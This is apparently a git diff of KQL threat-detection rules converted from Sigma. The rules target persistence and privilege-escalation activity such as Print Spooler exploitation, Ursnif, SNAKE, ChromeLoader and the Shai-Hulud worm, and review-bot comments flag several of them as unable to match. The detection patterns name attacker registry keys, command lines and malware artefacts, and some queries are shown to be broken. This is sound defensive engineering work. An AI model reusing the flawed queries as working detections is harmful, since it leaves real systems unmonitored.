+// Author: Bhabesh Raj
+// Date: 2021-07-01
+// Level: high
+// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
index 63cba99d..cdbe156e 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
@@ -1,11 +1,11 @@
-// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-07-31
-// Level: low
-// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
-// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-31
+// Level: low
+// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
+// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
+
+DeviceRegistryEvents
 | where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql
index 17a51abf..84dec431 100644
--- a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql
+++ b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql
@@ -1,10 +1,10 @@
-// Title: Potential Ursnif Malware Activity - Registry
-// Author: megan201296
-// Date: 2019-02-13
-// Level: high
-// Description: Detects registry keys related to Ursnif malware.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Potential Ursnif Malware Activity - Registry
+// Author: megan201296
+// Date: 2019-02-13
+// Level: high
+// Description: Detects registry keys related to Ursnif malware.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
index d5c956e7..eec23dce 100644
--- a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
+++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql
@@ -1,13 +1,13 @@
-// Title: ScreenConnect User Database Modification
-// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
-// Date: 2024-02-21
-// Level: medium
-// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
-// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
-// False Positives:
-// - This will occur legitimately as well and will result in some benign activity.
-
-DeviceFileEvents
+// Title: ScreenConnect User Database Modification
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
+// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
+// False Positives:
+// - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
index ff5530e3..11642822 100644
--- a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
+++ b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql
@@ -1,12 +1,12 @@
-// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-14
-// Level: critical
-// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
index f4b1f212..65049b31 100644
--- a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
+++ b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql
@@ -1,12 +1,12 @@
-// Title: Shai-Hulud Malicious GitHub Workflow Creation
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-24
-// Level: high
-// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Shai-Hulud Malicious GitHub Workflow Creation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
index 4873205b..bec70afe 100644
--- a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
+++ b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql
@@ -1,12 +1,12 @@
-// Title: Small Sieve Malware Registry Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-19
-// Level: high
-// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Small Sieve Malware Registry Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
index 947bc083..76302e5e 100644
--- a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
+++ b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql
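Review bot: `RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*"` in the query line can never match: KQL `endswith` compares the literal operand, so the trailing `*` is not a wildcard but a character the key would have to end with, and the whole rule is dead. This looks like a glob left over from the Sigma-to-KQL conversion this commit introduces. The intended condition is `RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Run"` (which also covers RunOnce, as the original wildcard did). The conversion script would benefit from a check that rejects `*` inside `startswith`/`endswith`/`contains` operands, since the same leftover is visible elsewhere in this patch.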
@@ -1,10 +1,10 @@ -// Title: SNAKE Malware Covert Store Registry Key -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-11 -// Level: high -// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats - -DeviceRegistryEvents +// Title: SNAKE Malware Covert Store Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-11 +// Level: high +// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql index 3332cc7a..04ffdd6d 100644 --- a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql +++ b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql 
@@ -1,10 +1,10 @@ -// Title: SOURGUM Actor Behaviours -// Author: MSTIC, FPT.EagleEye -// Date: 2021-06-15 -// Level: high -// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -// MITRE Tactic: Persistence -// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats - -DeviceProcessEvents +// Title: SOURGUM Actor Behaviours +// Author: MSTIC, FPT.EagleEye +// Date: 2021-06-15 +// Level: high +// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM +// MITRE Tactic: Persistence +// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql index 97a5181a..d6ec9f06 100644 --- a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql +++ b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql 
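Review bot: The first OR branch tests FolderPath for `Physmem.sys` and three `WimBootConfigurations.ini` paths on DeviceProcessEvents, where FolderPath is the image path of the created process; a driver or .ini file is never a process image, so that branch cannot fire and the file indicators are silently lost. Presumably those selections came from a file-event logsource in the Sigma rule and belong in a separate DeviceFileEvents query (`DeviceFileEvents | where FolderPath endswith "\\system32\\Physmem.sys" or FolderPath endswith "\\WimBootConfigurations.ini"`), leaving only the `reg add` branch here. The `windows\\system32\\filepath2` operand in the second branch also looks like a placeholder rather than a real path and is worth checking against the source rule.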
@@ -1,12 +1,12 @@ -// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) -// Author: EagleEye Team, Florian Roth -// Date: 2020-05-13 -// Level: high -// Description: Detects new commands that add new printer port which point to suspicious file -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats -// False Positives: -// - New printer port install on host - -DeviceProcessEvents +// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) +// Author: EagleEye Team, Florian Roth +// Date: 2020-05-13 +// Level: high +// Description: Detects new commands that add new printer port which point to suspicious file +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql index d403c1fd..0f4c8646 100644 --- a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql +++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql 
@@ -1,12 +1,12 @@ -// Title: Suspicious Process Spawned by CentreStack Portal AppPool -// Author: Jason Rathbun (Blackpoint Cyber) -// Date: 2025-04-17 -// Level: high -// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats -// False Positives: -// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. - -DeviceProcessEvents +// Title: Suspicious Process Spawned by CentreStack Portal AppPool +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2025-04-17 +// Level: high +// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats +// False Positives: +// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. + +DeviceProcessEvents | where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql index 91935847..12d977c9 100644 --- a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql 
+++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql @@ -1,12 +1,12 @@ -// Title: Windows Spooler Service Suspicious Binary Load -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021-06-29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats -// False Positives: -// - Loading of legitimate driver - -DeviceImageLoadEvents +// Title: Windows Spooler Service Suspicious Binary Load +// Author: FPT.EagleEye, Thomas Patzke (improvements) +// Date: 2021-06-29 +// Level: informational +// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Loading of legitimate driver + +DeviceImageLoadEvents | where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql index f839c135..5ca2cf40 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql 
+++ b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql @@ -1,12 +1,12 @@ -// Title: APT27 - Emissary Panda Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2018-09-03 -// Level: critical -// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: APT27 - Emissary Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2018-09-03 +// Level: critical +// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql index 5b225c54..c8c23753 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql 
@@ -1,12 +1,12 @@
-// Title: ChromeLoader Malware Execution
-// Author: @kostastsale
-// Date: 2022-01-10
-// Level: high
-// Description: Detects execution of ChromeLoader malware via a registered scheduled task
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: ChromeLoader Malware Execution
+// Author: @kostastsale
+// Date: 2022-01-10
+// Level: high
+// Description: Detects execution of ChromeLoader malware via a registered scheduled task
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
index ddea3ae3..57830565 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
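Review bot: `ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*"` is a case-insensitive equality test, so the `*` characters are literal and the command line would have to be exactly that string; the rule therefore never fires even though the remaining three predicates are sound. The glob presumably survived the Sigma conversion unchanged. Replace it with substring tests, `ProcessCommandLine contains "--load-extension=\"" and ProcessCommandLine contains "\\Appdata\\local\\chrome\""`, or a `matches regex` with the wildcards translated to `.*` if the ordering of the two fragments matters.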
@@ -1,13 +1,13 @@
-// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-20
-// Level: medium
-// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
-// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
-// False Positives:
-// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
-
-DeviceProcessEvents
+// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
+// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
+// False Positives:
+// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}"
\ No newline at end of file
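Review bot: `matches regex "[A-F0-9]{8}-..."` is case-sensitive in KQL (RE2), so a GUID passed in lowercase — the form most tooling emits — is missed even when the `_+_PublicSharingUser_` clause matches. Prefix the pattern with `(?i)` or widen the classes: `ProcessCommandLine matches regex "(?i)[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"`. The two `contains` tests on the same line are already case-insensitive, so this also makes the predicate consistent with the rest of the rule.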
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql index 42e82d5a..3f2876f4 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql @@ -1,10 +1,10 @@ -// Title: Defrag Deactivation -// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) -// Date: 2019-03-04 -// Level: medium -// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats - -DeviceProcessEvents +// Title: Defrag Deactivation +// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +// Date: 2019-03-04 +// Level: medium +// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql index 1ab20b16..58f0233d 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql 
@@ -1,10 +1,10 @@ -// Title: Exploiting CVE-2019-1388 -// Author: Florian Roth (Nextron Systems) -// Date: 2019-11-20 -// Level: critical -// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploiting CVE-2019-1388 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-20 +// Level: critical +// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql index cf85ad6d..e6427e64 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql 
@@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - Custom Protocol Handler Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the setting of a custom protocol handler with the name "rogue". -// Seen being created by Forest Blizzard APT as reported by MSFT. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Forest Blizzard APT - Custom Protocol Handler Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of a custom protocol handler with the name "rogue". +// Seen being created by Forest Blizzard APT as reported by MSFT. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql index 5a9afe86..171a3356 100644 --- a/KQL/rules-emerging-threats/Privilege 